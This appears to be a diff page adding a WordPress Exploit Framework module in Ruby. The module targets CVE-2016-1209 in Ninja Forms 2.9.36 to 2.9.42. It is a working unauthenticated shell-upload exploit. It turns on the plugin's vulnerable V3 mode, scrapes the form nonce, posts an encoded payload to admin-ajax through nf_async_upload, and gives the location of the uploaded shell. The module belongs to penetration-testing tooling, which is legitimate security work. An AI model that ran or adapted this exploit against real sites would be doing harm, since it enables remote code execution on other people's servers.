|
| 1 | +class Wpxf::Exploit::NinjaFormsUnauthenticatedShellUpload < Wpxf::Module |
| 2 | + include Wpxf::WordPress::ShellUpload |
| 3 | + |
| 4 | + def initialize |
| 5 | + super |
| 6 | + |
| 7 | + update_info( |
| 8 | + name: 'Ninja Forms 2.9.36 to 2.9.42 Unauthenticated Shell Upload', |
| 9 | + author: [ |
| 10 | + 'James Golovich', # Discovery and disclosure |
| 11 | + 'Rob Carr <rob[at]rastating.com>' # WPXF module |
| 12 | + ], |
| 13 | + references: [ |
| 14 | + ['CVE', '2016-1209'], |
| 15 | + ['WPVDB', '8485'], |
| 16 | + ['URL', 'http://www.pritect.net/blog/ninja-forms-2-9-42-critical-security-vulnerabilities'] |
| 17 | + ], |
| 18 | + date: 'May 04 2016' |
| 19 | + ) |
| 20 | + |
| 21 | + register_options([ |
| 22 | + StringOption.new( |
| 23 | + name: 'form_path', |
| 24 | + desc: 'The relative path of the page that hosts any form served by Ninja Forms', |
| 25 | + required: true |
| 26 | + ) |
| 27 | + ]) |
| 28 | + end |
| 29 | + |
| 30 | + def check |
| 31 | + check_plugin_version_from_readme('ninja-forms', '2.9.43', '2.9.36') |
| 32 | + end |
| 33 | + |
| 34 | + def uploader_url |
| 35 | + wordpress_url_admin_ajax |
| 36 | + end |
| 37 | + |
| 38 | + def payload_body_builder |
| 39 | + builder = Utility::BodyBuilder.new |
| 40 | + builder.add_field('action', 'nf_async_upload') |
| 41 | + builder.add_field('security', ninja_form_nonce) |
| 42 | + builder.add_file_from_string(Utility::Text.rand_alpha(5), payload.encoded, payload_name) |
| 43 | + builder |
| 44 | + end |
| 45 | + |
| 46 | + def uploaded_payload_location |
| 47 | + normalize_uri(wordpress_url_uploads, "nftmp-#{payload_name.downcase}") |
| 48 | + end |
| 49 | + |
| 50 | + def fetch_ninja_form_nonce |
| 51 | + res = execute_get_request(url: normalize_uri(full_uri, datastore['form_path'])) |
| 52 | + return false unless res && res.code == 200 |
| 53 | + @ninja_form_nonce = res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1] |
| 54 | + @ninja_form_nonce |
| 55 | + end |
| 56 | + |
| 57 | + def before_upload |
| 58 | + # Enable the v3 functionality. |
| 59 | + emit_info 'Enabling vulnerable V3 functionality...' |
| 60 | + execute_get_request(url: full_uri, params: { 'nf-switcher' => 'upgrade' }) |
| 61 | + |
| 62 | + # Fetch a nonce for the upload. |
| 63 | + emit_info 'Fetching Ninja Form nonce...' |
| 64 | + unless fetch_ninja_form_nonce |
| 65 | + emit_error 'Failed to acquire a valid nonce' |
| 66 | + emit_error "Ensure that #{normalize_uri(full_uri, datastore['form_path'])} contains a valid form" |
| 67 | + return false |
| 68 | + end |
| 69 | + emit_success "Nonce acquired: #{ninja_form_nonce}", true |
| 70 | + |
| 71 | + super |
| 72 | + end |
| 73 | + |
| 74 | + def cleanup |
| 75 | + # Disable the v3 functionality. |
| 76 | + execute_get_request(url: full_uri, params: { 'nf-switcher' => 'rollback' }) |
| 77 | + super |
| 78 | + end |
| 79 | + |
| 80 | + attr_reader :ninja_form_nonce |
| 81 | +end |
0 commit comments